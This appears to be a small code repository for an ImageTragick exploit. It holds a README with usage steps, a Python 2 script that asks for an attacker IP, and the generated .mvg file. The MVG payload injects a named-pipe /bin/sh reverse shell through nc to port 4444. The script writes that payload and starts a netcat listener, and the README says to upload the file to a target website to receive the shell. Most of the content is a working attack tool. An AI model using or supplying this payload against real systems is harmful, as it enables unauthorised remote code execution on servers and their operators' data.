├── imagik.mvg
├── ThreatDragonModels
    └── testing
    │   └── testing.json
├── README.md
└── imagik.py


/imagik.mvg:
--------------------------------------------------------------------------------
1 | push graphic-context 
2 | 
3 | viewbox 0 0 640 480
4 | 
5 | fill 'url(https://example.com/image.jpg"|mknod /tmp/pipez p;/bin/sh 0</tmp/pipez|nc 1 4444 1>/tmp/pipez;rm -rf "/tmp/pipez)'
6 | 
7 | pop graphic-context
8 | 
9 | 


--------------------------------------------------------------------------------
/ThreatDragonModels/testing/testing.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "summary": {
 3 |     "title": "testing",
 4 |     "owner": "pent101",
 5 |     "description": "api"
 6 |   },
 7 |   "detail": {
 8 |     "contributors": [],
 9 |     "diagrams": [],
10 |     "reviewer": "vraj"
11 |   }
12 | }


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## imagetragick
 2 | A simple script to exploit imagetragick vulnerability to gain remote code execution 
 3 | 
 4 | Ensure you have portforwarded to receive connections
 5 | 
 6 | python2.7 is been setted up as system path
 7 | 
 8 | Tested on mac and ubuntu
 9 | 
10 | ###Usage ./imagik.py
11 | 
12 | 
13 | 
14 | ```sh
15 | $ python imagik.py
16 | ```
17 | 
18 | ```sh
19 | 1.)Execute the py script
20 | 2.)Now give the (Public Ip) to connect back
21 | 3.)netcat will be waiting for reverse shell at port 4444
22 | 3.)Upload the .mvg file to the website you are testing 
23 | 5.)If site is vulnerable to the attack you will get the reverse shell via terminal
24 | .......
25 | 
26 | 
27 | 


--------------------------------------------------------------------------------
/imagik.py:
--------------------------------------------------------------------------------
 1 | print """
 2 |                       o                      o    
 3 | o                     |               o      | /  
 4 |   o-O-o  oo o--o o-o -o- o-o  oo o--o    o-o OO   
 5 | | | | | | | |  | |-'  |  |   | | |  | | |    | \  
 6 | | o o o o-o-o--O o-o  o  o   o-o-o--O |  o-o o  o 
 7 |                |                    |             
 8 |             o--o                 o--o             
 9 | 
10 | [+]Code by Vishwaraj- @vishwaraj101          \n"""
11 | 
12 | import os #os module
13 | 
14 | print "[+]Creating imagetragick exploit \n"
15 | ip=raw_input("Enter Reverse Ip>>> ")
16 | 
17 | #exploit code
18 | code="""push graphic-context 
19 | 
20 | viewbox 0 0 640 480
21 | 
22 | fill 'url(https://example.com/image.jpg"|mknod /tmp/pipez p;/bin/sh 0</tmp/pipez|nc %s 4444 1>/tmp/pipez;rm -rf "/tmp/pipez)'
23 | 
24 | pop graphic-context
25 | 
26 | """%(ip)
27 | 
28 | try:
29 | 	f=file("imagik.mvg","w")
30 | 	f.write(code)
31 | 	f.close()
32 | 	print "[+]exploit created imagik.mvg \n "
33 | 	print "[+]Waiting for reverse shell at 4444 ...\n "
34 | 	os.system("nc -l 4444")
35 | 
36 | except:
37 |   print "Cannot write the file"
38 | 
39 | 
40 | 
41 | 


--------------------------------------------------------------------------------